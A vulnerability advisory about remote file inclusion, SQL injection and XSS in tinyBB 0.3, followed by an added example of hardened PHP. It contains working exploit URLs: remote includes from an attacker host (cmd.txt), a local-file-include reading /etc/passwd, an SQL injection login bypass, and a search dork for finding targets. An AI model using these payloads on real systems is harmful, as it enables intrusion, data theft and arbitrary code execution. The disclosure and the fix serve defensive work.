tinyBB Bugs Permit Cross-Site Scripting and SQL Injection Attacks and Let Remote Users Execute Arbitrary Code
SecurityTracker Alert ID: 1016172

SecurityTracker URL: http://securitytracker.com/id?1016172

CVE Reference: CVE-2006-2739, CVE-2006-2740, CVE-2006-2741

Updated: Aug 25 2009

Original Entry Date: May 29 2006

Impact: Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network

Exploit Included: Yes

Version(s): 0.3 and prior versions

Description: A vulnerability was reported in tinyBB. A remote user can include and execute arbitrary code on the target system. A remote user can conduct cross-site scripting attacks. A remote user can inject SQL commands.

The 'footers.php' script does not properly validate user-supplied input. If register_globals is enabled, a remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/[tBBPath]/footers.php?tinybb_footers=http://[attacker]/cmd.txt?

The 'forgot.php' and 'login.php' scripts do not properly validate user-supplied input. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database. Other scripts and parameters are also affected.

A demonstration exploit URL is provided:

http://[target]/[tBBPath]/login.php?username=heh/**/or/**/isnull(1/0)/*&password=nothing

Several scripts do not properly filter HTML code from user-supplied input before displaying the input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the tinyBB software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

The vendor was notified on May 27, 2006.

A demonstration exploit is available at:

http://www.nukedx.com/?getxpl=33

The original advisory is available at:

http://www.nukedx.com/?viewdoc=33

Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI reported this vulnerability.

Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the tinyBB software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can execute SQL commands on the underlying database.

Solution: No solution was available at the time of this entry.

Vendor URL: www.epicdesigns.co.uk/projects/tinybb.php

Cause: Input validation error, State error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Reported By: Mustafa Can Bjorn IPEKCI <nukedx@nukedx.com>

Message History: None.

Source Message Contents

Date: Sun, 28 May 2006 16:57:23 +0300
From: Mustafa Can Bjorn IPEKCI <nukedx@nukedx.com>
Subject: [Full-disclosure] Advisory: tinyBB <= 0.3 Multiple Remote

--Security Report--
Advisory: tinyBB <= 0.3 Multiple Remote Vulnerabilities.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 27/05/06 05:37 AM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@nukedx.com
Web: http://www.nukedx.com
---
Vendor: Epicdesigns (http://www.epicdesigns.co.uk/)
Version: 0.3 and prior versions must be affected.
About: Via these methods a remote attacker can include arbitrary files in tinyBB. The tinybb_footers variable in footers.php is not sanitized before use. You can find the vulnerable code in footers.php at line 3
-Source in footers.php-
3: if (strlen($tinybb_footers) > 0) { require_once($tinybb_footers); }
-End of source-
Fixing this vulnerability is easy: turn off register_globals.
There is also an SQL injection in forgot.php. The parameter $q is not sanitized properly before being used in an SQL query.
You can find the vulnerable code in forgot.php at lines 3-18.
-Source in forgot.php-
3: if (isset($q)) {
4: $sql="SELECT COUNT(*) FROM tinybb_members WHERE username='$q' OR email='$q'";
5: $count = mysql_result(mysql_query($sql),0);
.....
-End of source-
This can also lead to XSS. You can find the vulnerable code in forgot.php at lines 19-21
-Source in forgot.php-
19: else {
20: echo "<p>The query <b>$q</b> could not be .....
21: }
-End of source-
There is another SQL injection in login.php. The parameters username and password are not sanitized properly before being used in an SQL query. You can find the vulnerable code in login.php at lines 2-8
-Source in login.php-
8: $sql="SELECT count(*) FROM tinybb_members WHERE flag='1' AND username='$username' AND password='$password'";
-End of source-
I didn't write up all the vulnerabilities in tinyBB; there are too many SQL injection and XSS vulnerabilities in this tiny bulletin board.
Level: Highly Critical
---
How&Example:
Successful exploitation needs allow_url_fopen set to 1 and register_globals on
GET -> http://[victim]/[tBBPath]/footers.php?tinybb_footers=evilscript
EXAMPLE ->
http://[victim]/[tBBPath]/footers.php?tinybb_footers=http://yourhost.com/cmd.txt?
If magic_quotes_gpc is off, a remote attacker can include local files too
EXAMPLE -> http://[victim]/[tBBPath]/footers.php?tinybb_footers=/etc/passwd%00
SQL injection on login.php
GET -> http://[victim]/[tBBPath]/login.php?username=heh/**/or/**/isnull(1/0)/*&password=nothing
---
Timeline:
* 27/05/2006: Vulnerability found.
* 27/05/2006: Contacted the vendor; awaiting reply.
---
Exploit: http://www.nukedx.com/?getxpl=33
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=33
---
Dorks: "Powered by tinyBB"
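The three code patterns quoted in the advisory (the footers.php include, the forgot.php lookup and echo, and the login.php query), rewritten in the form a maintainer would ship, as an added example that is neither tinyBB's code nor the reporter's: a fixed allowlist in place of the request-controlled require_once, prepared statements for both queries, and output escaping for the echoed $q. It assumes a PDO handle in $pdo, footer templates under footers/, password_hash() digests in the password column, and login credentials arriving by POST; none of those come from the page.

```php
<?php
// Added example, not tinyBB's code: hardened versions of the three snippets
// quoted in the advisory. Assumptions (not from the page): a PDO connection
// in $pdo, footer templates under footers/, and password_hash() digests in
// the password column. Also set register_globals = Off, as the advisory says.

// footers.php (line 3) did require_once($tinybb_footers) on request input.
// Map a short key to files the install ships with, so neither a remote URL
// nor a NUL-truncated local path can reach the include.
function resolveFooter(?string $key): string
{
    $allowed = [
        'default' => __DIR__ . '/footers/default.php',
        'minimal' => __DIR__ . '/footers/minimal.php',
    ];
    return $allowed[$key ?? 'default'] ?? $allowed['default'];
}
require_once resolveFooter($_GET['tinybb_footers'] ?? null);

// forgot.php (lines 3-5, 19-21): bind $q instead of interpolating it into the
// query, and HTML-escape it before echoing it back.
function forgotLookup(PDO $pdo, string $q): int
{
    $stmt = $pdo->prepare(
        'SELECT COUNT(*) FROM tinybb_members WHERE username = ? OR email = ?'
    );
    $stmt->execute([$q, $q]);
    return (int) $stmt->fetchColumn();
}
if (isset($_GET['q'])) {
    $q = (string) $_GET['q'];
    if (forgotLookup($pdo, $q) === 0) {
        echo '<p>The query <b>' . htmlspecialchars($q, ENT_QUOTES, 'UTF-8')
           . '</b> could not be found.</p>';
    }
}

// login.php (line 8): bound username, and the password checked with
// password_verify() instead of being compared as a literal in the WHERE clause.
function checkLogin(PDO $pdo, string $username, string $password): bool
{
    $stmt = $pdo->prepare(
        "SELECT password FROM tinybb_members WHERE flag = '1' AND username = ?"
    );
    $stmt->execute([$username]);
    $hash = $stmt->fetchColumn();
    return $hash !== false && password_verify($password, $hash);
}
$loggedIn = checkLogin($pdo, (string) ($_POST['username'] ?? ''),
                       (string) ($_POST['password'] ?? ''));
```

With the allowlist in place, the `?tinybb_footers=` value from the advisory's URLs is never passed to require_once at all, which is the check to confirm when reviewing a patched install.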